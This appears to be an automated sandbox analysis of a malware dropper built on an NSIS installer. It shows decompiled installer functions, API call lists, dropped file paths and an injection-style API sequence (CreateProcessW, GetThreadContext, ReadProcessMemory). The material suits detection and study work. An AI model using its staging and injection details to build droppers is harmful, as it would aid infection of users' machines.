				_push( *(_t86 - 8));
				_t81 = L"KXCJ";
				if(_t35 == 0) {
					lstrcatW(E00405E11(E0040653C(_t81, L"C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
				} else {
					E0040653C();
				}
				E004067EB(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040689A(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E0040600D(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00406032(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004055A4(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a308;
						goto L32;
					} else {
						E0040653C(0x40b5f8, _t83);
						E0040653C(_t83, _t81);
						E00406579(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp\nsb1C63.tmp\qm1tw12xr.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040653C(_t83, 0x40b5f8);
						_t64 = E00405BA2("C:\Users\jones\AppData\Local\Temp\nsb1C63.tmp\qm1tw12xr.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a308 =  &( *0x42a308->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004055A4();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004055A4(0xffffffea,  *(_t86 - 8));
				 *0x42a334 =  *0x42a334 + 1;
				_t45 = E00403309(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a334 =  *0x42a334 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E00406579(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E00406579(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405BA2();
					goto L29;
				}
				goto L33;
			}


















              0x0040176f
              0x00401776
              0x00401782
              0x00401785
              0x0040178a
              0x0040178d
              0x00401794
              0x004017b0
              0x00401796
              0x00401797
              0x00401797
              0x004017b6
              0x004017bb
              0x004017bb
              0x004017bf
              0x004017c2
              0x004017c7
              0x004017c9
              0x004017cb
              0x004017d0
              0x004017d0
              0x004017db
              0x004017db
              0x004017ec
              0x004017ee
              0x004017ee
              0x004017ef
              0x004017ef
              0x004017f2
              0x004017f5
              0x004017f8
              0x004017f8
              0x004017ff
              0x0040180e
              0x00401813
              0x00401816
              0x00401819
              0x00000000
              0x00000000
              0x0040181b
              0x0040181e
              0x00401874
              0x00401879
              0x004015b6
              0x00402925
              0x00402925
              0x00402bc2
              0x00402bc5
              0x00402bc5
              0x00000000
              0x00401820
              0x00401826
              0x0040182d
              0x0040183a
              0x00401845
              0x0040185b
              0x0040185b
              0x0040185e
              0x00000000
              0x00401864
              0x00401864
              0x00401865
              0x00401882
              0x00402bcb
              0x00402bcb
              0x00402bcb
              0x00401867
              0x00401867
              0x00401868
              0x00401493
              0x00402395
              0x00402395
              0x00402395
              0x00401865
              0x0040185e
              0x00402bcd
              0x00402bd1
              0x00402bd1
              0x00401892
              0x00401897
              0x004018a5
              0x004018aa
              0x004018b0
              0x004018b4
              0x004018b6
              0x004018be
              0x004018ca
              0x004018b8
              0x004018b8
              0x004018bc
              0x00000000
              0x00000000
              0x004018bc
              0x004018d3
              0x004018d9
              0x004018db
              0x00000000
              0x004018e1
              0x004018e1
              0x004018e4
              0x004018fc
              0x004018e6
              0x004018e9
              0x004018f2
              0x004018f2
              0x00401901
              0x00401906
              0x00402390
              0x00000000
              0x00402390
              0x00000000

              APIs
              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
              • CompareFileTime.KERNEL32(-00000014,?,KXCJDFJSKF,KXCJDFJSKF,00000000,00000000,KXCJDFJSKF,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000,?), ref: 004055DC
                • Part of subcall function 004055A4: lstrlenW.KERNEL32(00403040,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00403040,00000000), ref: 004055EC
                • Part of subcall function 004055A4: lstrcatW.KERNEL32(00422728,00403040), ref: 004055FF
                • Part of subcall function 004055A4: SetWindowTextW.USER32(00422728,00422728), ref: 00405611
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405637
                • Part of subcall function 004055A4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405651
                • Part of subcall function 004055A4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565F
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
              • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsb1C63.tmp\qm1tw12xr.dll$KXCJDFJSKF
              • API String ID: 1941528284-804983563
              • Opcode ID: 4b913798fb200dfea553bd9fe538fd44ff4447b51554b0a60bb8fefd456ad0c1
              • Instruction ID: 1f20f3305f5cdc04e1f2059eaac63a386f89c848407f65c8aae314978641b4a4
              • Opcode Fuzzy Hash: 4b913798fb200dfea553bd9fe538fd44ff4447b51554b0a60bb8fefd456ad0c1
              • Instruction Fuzzy Hash: 08419431500114BACF10BFB9DD85DAE7A79EF45729B20423FF422B10E2D73C8A519A6E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F11450, Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 461memoryfileCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 02F1126A: Sleep.KERNELBASE(?,?,034CF0BF), ref: 02F1128F
              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02F118E7
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02F11960
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.706730415.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID: AllocCreateFileSleepVirtual
              • String ID: 912b4404d7d84462b22a6b7539dd3e97
              • API String ID: 3031228858-2352350902
              • Opcode ID: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction ID: 0e0c1f0854972cb0b8b111aa65489d29d9002ae4c88cc3b85f6e7afb3584bd52
              • Opcode Fuzzy Hash: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction Fuzzy Hash: 47024B25E54398E9EB61CBE4EC16BEDB7B5AF04B10F50448AE60CFA1D1D3B10A84DF16
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F10950, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02F10A52
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02F10C1F
              Memory Dump Source
              • Source File: 00000008.00000002.706730415.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID: CreateFileFreeVirtual
              • String ID:
              • API String ID: 204039940-0
              • Opcode ID: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction ID: 04d0a6c51d010c2d90088deb031727e81730b81c60a4c3156ce8ff28ee7549dd
              • Opcode Fuzzy Hash: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction Fuzzy Hash: B5A1F035E00249EFDF14CFE4C985BADBBB1EF08355F60849AEA10BA2A0D7755A81DF14
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405A73, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00405A73(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







              0x00405a7e
              0x00405a82
              0x00405a85
              0x00405a8b
              0x00405a8f
              0x00405a93
              0x00405a9b
              0x00405aa2
              0x00405aa8
              0x00405aaf
              0x00405ab6
              0x00405abe
              0x00405ac0
              0x00000000
              0x00405ac0
              0x00405aca
              0x00405ad1
              0x00405ae7
              0x00000000
              0x00000000
              0x00000000
              0x00405ae9
              0x00405aed

              APIs
              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
              • GetLastError.KERNEL32 ref: 00405ACA
              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADF
              • GetLastError.KERNEL32 ref: 00405AE9
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A99
              • C:\Users\user\AppData\Roaming\tteegmiuoefs, xrefs: 00405A73
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ErrorLast$CreateDirectoryFileSecurity
              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\tteegmiuoefs
              • API String ID: 3449924974-3996335378
              • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
              • Instruction ID: 182fb86997ef6356dfbf0076fac1484c8d0c28c6014f2d3d8060d55cd567293f
              • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
              • Instruction Fuzzy Hash: 30010871D00619EADF019BA0C988BEFBFB8EF04315F00813AD545B6280D7789648CFA9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004068C1, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E004068C1(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








              0x004068d8
              0x004068e1
              0x004068e3
              0x004068e3
              0x004068e7
              0x004068fa
              0x004068f4
              0x004068f4
              0x004068f4
              0x00406913
              0x00406927
              0x0040692e

              APIs
              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
              • wsprintfW.USER32 ref: 00406913
              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406927
              Strings
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: DirectoryLibraryLoadSystemwsprintf
              • String ID: %s%S.dll$UXTHEME$\
              • API String ID: 2200240437-1946221925
              • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
              • Instruction ID: 979e31ef7f6a653eb027d6e7281dab5f214eebcb072a06bc6d9d9cfc9f176359
              • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
              • Instruction Fuzzy Hash: BDF02B71501219A7CB14BB68DD0DF9B376CEB00304F10447EA646F10D0EB7CDA68CB98
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00406061, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00406061(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












              0x00406067
              0x0040606d
              0x0040606e
              0x0040606e
              0x00406073
              0x00406074
              0x00406077
              0x0040607c
              0x0040607f
              0x00406089
              0x00406096
              0x0040609a
              0x004060a2
              0x00000000
              0x00000000
              0x004060a6
              0x00000000
              0x004060a8
              0x004060a8
              0x004060a8
              0x004060ab
              0x004060ae
              0x004060ae
              0x004060b1
              0x00000000

              APIs
              • GetTickCount.KERNEL32 ref: 0040607F
              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" ,004035D6,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822), ref: 0040609A
              Strings
              • "C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" , xrefs: 00406061
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00406066
              • nsa, xrefs: 0040606E
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CountFileNameTempTick
              • String ID: "C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe" $C:\Users\user\AppData\Local\Temp\$nsa
              • API String ID: 1716503409-2117798896
              • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
              • Instruction ID: f50322da3c8d1fbf3185d5aa4cbdefdd087cb84507cf15d2c2e6a21a41158221
              • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
              • Instruction Fuzzy Hash: BBF09076741204BFEB00CF59DD05E9EB7BCEBA1710F11803AFA05F7240E6B499648768
              Uniqueness

              Uniqueness Score: -1.00%

              Function 02F10034, Relevance: 6.7, APIs: 4, Instructions: 727processthreadCOMMON
              Download Yara Rule
              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 02F105BE
              • GetThreadContext.KERNELBASE(?,00010007), ref: 02F105E1
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02F10605
              Memory Dump Source
              • Source File: 00000008.00000002.706730415.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID: Process$ContextCreateMemoryReadThread
              • String ID:
              • API String ID: 2411489757-0
              • Opcode ID: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction ID: 5b6f82afa4f19e7e8ed4e9742af0cb87ba6dc42dff5e3dd75d013b1d3426825a
              • Opcode Fuzzy Hash: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction Fuzzy Hash: 6F525D35E50258EEEB60CBA4EC55BFDB7B5AF48710F50449AEA08EA2A0D7705EC0DF05
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004015C1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
              Download Yara Rule
              C-Code - Quality: 86%
              			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402D3E(0xfffffff0);
				_t17 = E00405EBC(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405E3E(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405AF0( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B0D(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405A73( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040653C(L"C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a308 =  *0x42a308 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











              0x004015c1
              0x004015c9
              0x004015cc
              0x004015d1
              0x004015d5
              0x004015d7
              0x004015df
              0x004015e1
              0x004015e4
              0x004015ea
              0x00401604
              0x00401607
              0x004015ec
              0x004015ec
              0x004015ef
              0x00000000
              0x004015fa
              0x004015fd
              0x004015fd
              0x004015ef
              0x0040160e
              0x00401615
              0x00401624
              0x00401624
              0x00401617
              0x0040161a
              0x00401622
              0x00000000
              0x00000000
              0x00401622
              0x00401615
              0x00401627
              0x0040162b
              0x0040162c
              0x004015d7
              0x00401634
              0x00401663
              0x004022e9
              0x00401636
              0x00401638
              0x00401645
              0x0040164d
              0x00401655
              0x0040165b
              0x0040165b
              0x00401655
              0x00402bc5
              0x00402bd1

              APIs
                • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,73BCFAA0,?,73BCF560,00405C6E,?,73BCFAA0,73BCF560,00000000), ref: 00405ECA
                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                • Part of subcall function 00405A73: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
              Strings
              • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CharNext$Directory$AttributesCreateCurrentFile
              • String ID: C:\Users\user\AppData\Local\Temp
              • API String ID: 1892508949-47812868
              • Opcode ID: dcb730f39e3dd6a344b0b4a95f59667c82559ddfc9f43997ecf154a5f55b7a43
              • Instruction ID: 804c449170a8270e91f9515fbcc2e09aef6974e60d9951be020b7c668b26977e
              • Opcode Fuzzy Hash: dcb730f39e3dd6a344b0b4a95f59667c82559ddfc9f43997ecf154a5f55b7a43
              • Instruction Fuzzy Hash: 1511E231504115ABCF30AFA5CD4199F36B0EF24329B28493BE956B12F1D63E4E829F5E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00407090, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
              Download Yara Rule
              C-Code - Quality: 99%
              			E00407090() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004074FE))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
